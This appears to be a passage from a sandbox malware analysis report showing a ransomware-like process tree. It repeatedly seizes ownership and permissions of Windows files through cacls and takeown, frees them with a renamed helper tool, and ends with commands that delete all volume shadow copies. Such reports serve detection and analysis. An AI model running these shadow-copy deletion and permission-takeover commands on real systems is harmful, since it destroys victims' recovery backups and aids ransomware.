    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
    3⤵
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
      4⤵
      PID:4332
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    3⤵
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftWordpad.xml" -nobanner
      4⤵
      PID:3392
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat""
  2⤵
  PID:2452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat" /E /G Admin:F /C
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat"
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
    3⤵
    PID:4684
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
      4⤵
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl""
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" /E /G Admin:F /C
    3⤵
    PID:880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl"
    3⤵
    PID:724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" -nobanner
      4⤵
      PID:4560
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:560
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2220
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2948
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4940
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4044
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:4156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:4256
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:4272
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  2⤵
  PID:3224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    3⤵
    PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
      4⤵
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  2⤵
  PID:680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    3⤵
    PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
      4⤵
      PID:4276
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  2⤵
  PID:4808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "ThemeSettings2013.xml" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "ThemeSettings2013.xml" -nobanner
      4⤵
      PID:4904
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:4604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:4316
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      PID:3400
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:3844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:4228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:4812
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3420
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4132
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:4212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4912
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\edb.log""
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\edb.log" /E /G Admin:F /C
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\edb.log"
    3⤵
    - Modifies file permissions
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "edb.log" -nobanner
    3⤵
    PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "edb.log" -nobanner
      4⤵
      PID:4780
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:5032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:4124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:2512
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:5100
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:3320
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:1716
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1""
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
    3⤵
    PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
      4⤵
      PID:4244
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:4508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:4216
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      PID:4432
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3568
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3876

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3gokKXdQ.bat"
1⤵
PID:732
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:2752
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
